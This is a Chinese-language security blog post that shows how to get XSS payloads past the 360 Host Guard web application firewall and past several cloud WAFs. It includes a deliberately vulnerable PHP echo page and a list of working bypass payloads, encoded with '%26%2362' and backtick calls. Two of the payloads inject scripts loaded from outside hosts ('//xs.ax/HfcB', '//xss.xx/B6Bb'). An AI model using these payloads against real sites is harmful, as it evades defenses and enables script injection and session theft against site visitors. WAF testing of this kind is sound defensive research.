记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某主机卫士xss绕过

2020-02-24 13:23

前言


360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务...

(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)

环境


火狐

360主机卫士Apache版

phpStudy2016(PHP-5.4.45+Apache)

测试代码

<?php   
$input = @$_REQUEST["xss"];
echo "<div>".$input."</div>"
?>

测试


习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋...然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。

<svg onload> 拦截

<svg > onload>不拦截

具体绕过就是先把 > html实体编码

&#62 URL编码

大部分 xss payload 加上 %26%2362 即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换

<svg %26%2362 onload=alert`1`>

给几个测试绕过的 payload

<style  %26%2362 onload=alert`1`>
<img %26%2362 src=1 onerror=alert`1`>
<audio %26%2362 src=x onerror=alert`1`>
<svg %26%2362 onload=appendChild(createElement('script')).src='//xs.ax/HfcB'>

该文章在最后说明此方法可以绕过多款waf,接下来我们来测试。

云锁

绕过

<svg %26%2362 onload=alert`1`>

奇安信CDN

拦截

<svg %26%2362 onload=alert`1`>

绕过方法(使用HTML5新标签)

<select autofocus onfocus=[2].find(alert)>

安全狗

绕过

阿里云

拦截

绕过方法(这个百度下就有)

<img src=# onerror=alert`2`>
<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>

百度云加速

绕过

小结

此次利用 > 字符的编码绕过的姿势,再到其他 waf 测试到此结束,至于其他特殊字符是否也有绕过,感兴趣的可以研究下,如有错误之处,请师傅指正。
(文笔尚浅,内容浅显,不足之处欢迎师傅们指点和纠正,感激不尽)

参考

xss加入某些字符即可过大多数waf的思路及一些思考

知识来源: xz.aliyun.com/t/7241

阅读:20135 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“某主机卫士xss绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词